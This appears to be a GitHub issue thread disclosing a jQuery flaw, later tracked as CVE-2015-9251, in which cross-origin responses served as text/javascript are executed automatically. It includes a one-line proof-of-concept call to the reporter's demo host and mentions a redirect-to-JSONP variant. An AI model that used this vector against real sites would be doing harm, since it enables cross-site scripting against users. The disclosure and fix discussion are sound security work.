Inadequate/dangerous jQuery behavior for 3rd party text/javascript responses
Because of this https://github.com/jquery/jquery/blob/250a1990baa571de60325ab2c52eabb399c4cf9e/src/ajax/script.js#L18 every text/javascript response gets executed. Even if we made a request to another service. CORS was created exactly to prevent this kind of behavior in JSONP (arbitrary code execution).
So when we do `$.get('http://weather.com/sf-weather')` or like in Rails' jquery_ujs a form is being sent automatically, the attacker can respond to us with text/javascript and execute arbitrary code on our origin. Demo `$.get('http://sakurity.com/jqueryxss')`
The fix is to not execute responses from 3rd party origins by default and make it an option. Don’t know who to cc to discuss it.
P.S. I would switch it off for same origin too, because using subtle redirect_to saving tricks we can redirect the user to a local JSONP endpoint and still get an XSS, but those are much more sophisticated vectors.
Everything about automated script detection is configurable so it’s pretty easy to disable it (untested examples that should work):
Not a fan of changing the behaviour within the lib but I can understand the rationale (though I'd recommend just removing the javascript dataType detection in the default options then).
CVE-2015-9251 was assigned to track this issue.